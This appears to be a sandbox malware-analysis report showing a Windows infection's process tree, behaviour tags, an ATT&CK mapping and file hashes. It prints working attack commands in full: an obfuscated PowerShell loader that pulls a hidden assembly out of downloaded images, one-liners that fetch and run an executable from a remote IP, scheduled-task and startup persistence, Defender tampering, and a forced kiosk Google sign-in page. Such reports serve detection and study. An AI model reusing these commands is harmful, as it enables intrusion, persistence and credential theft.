DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ
@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBk@GU@QQBt@Go@ZwBu@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4444
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfhgdf/hfgjew/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.deAmjgn/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4308
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4600
C:\Users\Admin\AppData\Local\Temp\10144510101\OSKDbmy.exe"C:\Users\Admin\AppData\Local\Temp\10144510101\OSKDbmy.exe"4⤵
- Executes dropped EXE
PID:3572
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /sc minute /mo 1 /tn MyTask /tr ""C:\Users\Admin\AppData\Roaming\Suh\jdk-21.0.6\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\Suh\niga.jar"" /F5⤵
- Scheduled Task/Job: Scheduled Task
PID:3524
C:\Users\Admin\AppData\Local\Temp\10147600101\1ecf164df8.exe"C:\Users\Admin\AppData\Local\Temp\10147600101\1ecf164df8.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2436
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn uwTdvmajKke /tr "mshta C:\Users\Admin\AppData\Local\Temp\8dwYpKQXk.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
PID:4164
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn uwTdvmajKke /tr "mshta C:\Users\Admin\AppData\Local\Temp\8dwYpKQXk.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4532
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\8dwYpKQXk.hta5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2096
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3020
C:\Users\Admin\AppData\Local\TempNU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE"C:\Users\Admin\AppData\Local\TempNU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2084
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10147610121\am_no.cmd" "4⤵
- System Location Discovery: System Language Discovery
PID:3356
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:956
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:948
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4116
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:5336
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5360
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:5520
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5536
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "3c8CRmaZk4n" /tr "mshta \"C:\Temp\hdsNTGt9F.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5708
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\hdsNTGt9F.hta"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5732
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5808
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1608
C:\Users\Admin\AppData\Local\Temp\10148360101\71c36a0ccc.exe"C:\Users\Admin\AppData\Local\Temp\10148360101\71c36a0ccc.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:7040
C:\Users\Admin\AppData\Local\Temp\10148370101\68174908c0.exe"C:\Users\Admin\AppData\Local\Temp\10148370101\68174908c0.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3544
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"5⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:4564
C:\Users\Admin\AppData\Local\Temp\10148380101\a78102cae3.exe"C:\Users\Admin\AppData\Local\Temp\10148380101\a78102cae3.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:7032
C:\Users\Admin\AppData\Local\Temp\10148380101\a78102cae3.exe"C:\Users\Admin\AppData\Local\Temp\10148380101\a78102cae3.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:8108
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7032 -s 8005⤵
- Program crash
PID:8116
C:\Users\Admin\AppData\Local\Temp\10148390101\5dfd273896.exe"C:\Users\Admin\AppData\Local\Temp\10148390101\5dfd273896.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6228
C:\Users\Admin\AppData\Local\Temp\D85OAYSPRW6ZOQBEAL9BAA9T7.exe"C:\Users\Admin\AppData\Local\Temp\D85OAYSPRW6ZOQBEAL9BAA9T7.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6796
C:\Users\Admin\AppData\Local\Temp\10148400101\c8e0738fcd.exe"C:\Users\Admin\AppData\Local\Temp\10148400101\c8e0738fcd.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6100
C:\Users\Admin\AppData\Local\Temp\10148410101\24fba0a6a6.exe"C:\Users\Admin\AppData\Local\Temp\10148410101\24fba0a6a6.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:7404
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6264
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5004
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1468
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7916
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7608
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking5⤵PID:7604
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking6⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:6412
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1992 -parentBuildID 20240401114208 -prefsHandle 1908 -prefMapHandle 1900 -prefsLen 27430 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3986eac7-0429-46d4-94cf-957976949368} 6412 "\\.\pipe\gecko-crash-server-pipe.6412" gpu7⤵PID:6252
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2456 -prefMapHandle 2432 -prefsLen 28350 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e94b7647-94a4-4d0f-b03e-ba8b628c4834} 6412 "\\.\pipe\gecko-crash-server-pipe.6412" socket7⤵PID:6408
C:\Program Files\Mozilla Firefox\firefox.exe
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2820 -childID 1 -isForBrowser -prefsHandle 3136 -prefMapHandle 2868 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1184 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {20d52cfe-0d19-4dfb-8153-beb9d30277db} 6412 "\\.\pipe\gecko-crash-server-pipe.6412" tab
Process tree depth: 7
PID:5976
C:\Program Files\Mozilla Firefox\firefox.exe
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2768 -childID 2 -isForBrowser -prefsHandle 4064 -prefMapHandle 4060 -prefsLen 32840 -prefMapSize 244658 -jsInitHandle 1184 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4982101d-6810-47f2-a09d-ac49dc1d71eb} 6412 "\\.\pipe\gecko-crash-server-pipe.6412" tab
Process tree depth: 7
PID:7712
C:\Program Files\Mozilla Firefox\firefox.exe
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4868 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4876 -prefMapHandle 4872 -prefsLen 32840 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6957ab6f-b778-4b4e-afdc-5d25e1586ca1} 6412 "\\.\pipe\gecko-crash-server-pipe.6412" utility
Process tree depth: 7
- Checks processor information in registry
PID:8508
C:\Program Files\Mozilla Firefox\firefox.exe
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5284 -childID 3 -isForBrowser -prefsHandle 5300 -prefMapHandle 5296 -prefsLen 27038 -prefMapSize 244658 -jsInitHandle 1184 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0bbb3ff8-72f2-4965-9f2e-d9677e5ccd4c} 6412 "\\.\pipe\gecko-crash-server-pipe.6412" tab
Process tree depth: 7
PID:8892
C:\Program Files\Mozilla Firefox\firefox.exe
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5520 -childID 4 -isForBrowser -prefsHandle 5440 -prefMapHandle 5448 -prefsLen 27038 -prefMapSize 244658 -jsInitHandle 1184 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {08199c5f-fb00-4ef7-94fd-09428b233649} 6412 "\\.\pipe\gecko-crash-server-pipe.6412" tab
Process tree depth: 7
PID:8904
C:\Program Files\Mozilla Firefox\firefox.exe
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5604 -childID 5 -isForBrowser -prefsHandle 5648 -prefMapHandle 5656 -prefsLen 27038 -prefMapSize 244658 -jsInitHandle 1184 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ac60805-86da-48ba-a626-8ce064f11cb5} 6412 "\\.\pipe\gecko-crash-server-pipe.6412" tab
Process tree depth: 7
PID:8916
C:\Users\Admin\AppData\Local\Temp\10148420101\1abbe437ef.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\10148420101\1abbe437ef.exe"
Process tree depth: 4
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3544
C:\Windows\SysWOW64\cmd.exe
Command line: cmd /c schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\Admin\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
Process tree depth: 2
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4912
C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\Admin\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
Process tree depth: 3
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2136
C:\Windows\SysWOW64\cmd.exe
Command line: cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & echo URL="C:\Users\Admin\AppData\Local\EduGenius Studios Co\EduGeniusX.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & exit
Process tree depth: 2
- Drops startup file
- System Location Discovery: System Language Discovery
PID:2100
C:\Users\Admin\AppData\Roaming\Suh\jdk-21.0.6\bin\javaw.exe
Command line: C:\Users\Admin\AppData\Roaming\Suh\jdk-21.0.6\bin\javaw.exe -jar C:\Users\Admin\AppData\Roaming\Suh\niga.jar
Process tree depth: 1
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:2476
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
Command line: C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
Process tree depth: 1
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2420
C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 7032 -ip 7032
Process tree depth: 1
PID:5744
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
Command line: C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
Process tree depth: 1
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7320
Network
MITRE ATT&CK Enterprise v15
Tactic / Technique (count) / Sub-technique (count)

Execution
  Command and Scripting Interpreter (1)
    PowerShell (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)

Persistence
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (4)
    Windows Service (4)
  Scheduled Task/Job (1)
    Scheduled Task (1)

Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (4)
    Windows Service (4)
  Scheduled Task/Job (1)
    Scheduled Task (1)

Defense Evasion
  Impair Defenses (5)
    Disable or Modify Tools (5)
  Indicator Removal (1)
    File Deletion (1)
  Modify Registry (6)
  Virtualization/Sandbox Evasion (2)

Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (3)
    Credentials In Files (3)
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
1KB
MD5c2591b8d3c298836fc77aeec431b0a88
SHA156aed0d369ac0a912275f1d29075c78da932e2a7
SHA256bfca64476080417d90c94877309a740be930c08c7d60bd2579ff9b523b4d9c9f
SHA51295162e3fd633a27db36565cacc0c6e0ce220e080ca402849238cf4db42ed19772959c4d664a82cfbfeceac4271d49a0f1f5a2c0edceecbd100d7f7797a5211c8
-
Filesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\activity-stream.discovery_stream.json
Filesize
24KB
MD5ba54a92ff0fc7ce08c251afe86deb442
SHA1fb8af1da9439777c08b0330fb362f6b96bf4e60f
SHA25611b454ba2b8f7f0a73f1f7efe14f8b3973c2d0722cc4b7788dc7837399d784cb
SHA512e6eab7e55db735b3065e2bbc3220771f25865653dc3582d94ad96b533dbd9fa4264fbfeb19218c6a4cbeec1fd970159656253e11b5a9537cd5cf6da1e4646d56
-
Filesize
1.8MB
MD58c46fe8eee484e73651be335c8ee5e84
SHA19d9b074b985584f45cb6c7a620970dc6a599fb72
SHA2568863fb5e08bc5fe36263d7e0c34f14aa6102526a891a972ee2dc0ac5f6708619
SHA512e2ccec1c15c1d380000afacb0d0755aa25fb2964bfc62d0317f66271dd10964f4f3a02158878da794b99d18c2649b83a0b38387114962becd776234f39e289d3
-
Filesize
1.3MB
MD581791c3bf6c8d01341e77960eafc2636
SHA13a9e164448717ced3d66354f17d3bcba9689c297
SHA256c1bfa0e9313ea896eba6329eb52b70374df276493468ca30d633f825f91f52a0
SHA5120629a854e68e3742448447d732a6eb21bcf47dd451552f9699d227fed2733c54a508e4fbfd647c11bee2b5f031bbda0e9f16b5af84c800598a1fe72368aa2f47
-
Filesize
223KB
MD548399a2cd5d12883e5398bfaa9294ca1
SHA1df9062932f7c8c20247741f6fa87be58fd6189c2
SHA256d54292b98ca9ed8530d018d87e1d92c23a8e0822db61e814df393ca8f0519c61
SHA51256a3b88a7bf2f9cf546239820b67ba7d78e217b5a2380c68e439e72bbf6a27022c4c97dbfbe2b1c90d5f35cb6af8f64b53d407aac269b9c377e235ccd7094a6e
-
Filesize
159KB
MD536beea554789233179f8275b85035d42
SHA1f4bd79044a32adb1b678aaec13eda99d9f169215
SHA256df5311f9bb283913fd5295202df47050893b8ed4f29b1801e1720f5443e87163
SHA512f8868aa5609787a5222d393848ee8fdb2551691470c6f0e0f30242660c048f6ed7306aa4c46c6b0f359800b422c056fbb1f66fe750effd3a7c47fff7394de49d
-
Filesize
157KB
MD50326cd5c88d3e050505ab2393419f42b
SHA14c6fffddb7e847eed99ff8be2d6fdac646bd7814
SHA256def6fa4a8b3ee3c0a3ca8826fffc8d5757169bddd6f091e303038d8e32e154a1
SHA51276dcdb96c21bf010aac5e58d6cc3ad71538d7ed7a726df4a18be5e5201c191a75df7ea7c535c3529b12ccc1c5aa213d0821982e88763a680e461cb603ecf7903
-
Filesize
938KB
MD5fa6a1328fe5807c6c657df9cd2be8d2d
SHA129199b861dcf2f663715ff8079b6ee03f3b30acd
SHA256fbdbc0c3566e09aef10a253714963bb6649113e5fbfbad694938c2cf1fdf1ef0
SHA5129eab533743e20441768a135e9fe1b927122c3e717669f3dde967ca0db7f2513c0daed40fa57b3413f4148b4185a7ad05c9a7416783d6350dea65bf54a4d28188
-
Filesize
1KB
MD5cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1b0db8b540841091f32a91fd8b7abcd81d9632802
SHA2565e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5
-
Filesize
1.8MB
MD51352d6cd58d12dc979e8a8ba9adbc5d2
SHA139dd8454f4a8c896284bbca4d855a76ff56bfad4
SHA2565c3e08f00ee169da6e3c5ce8927d2b00be5b4f12554e5c4dc9e35d6ba6c80834
SHA5123a37fe2a74f55941c909dbe4bcf09ebd8622e791308bffef68c186db156e33d935dd809b0e4975c0af7473207445af209a88baca6c4e180e634993a8a63b073e
-
Filesize
4.4MB
MD58d0c36e088d4a7a3c5dc5b8683bfb2f3
SHA1485ae76bdb6eaf901c3a99acda978310437b39cc
SHA256af20a57aaad683736f7e0bbbfd36cd7ca534ccf6c8ee595b5f88569428b550b3
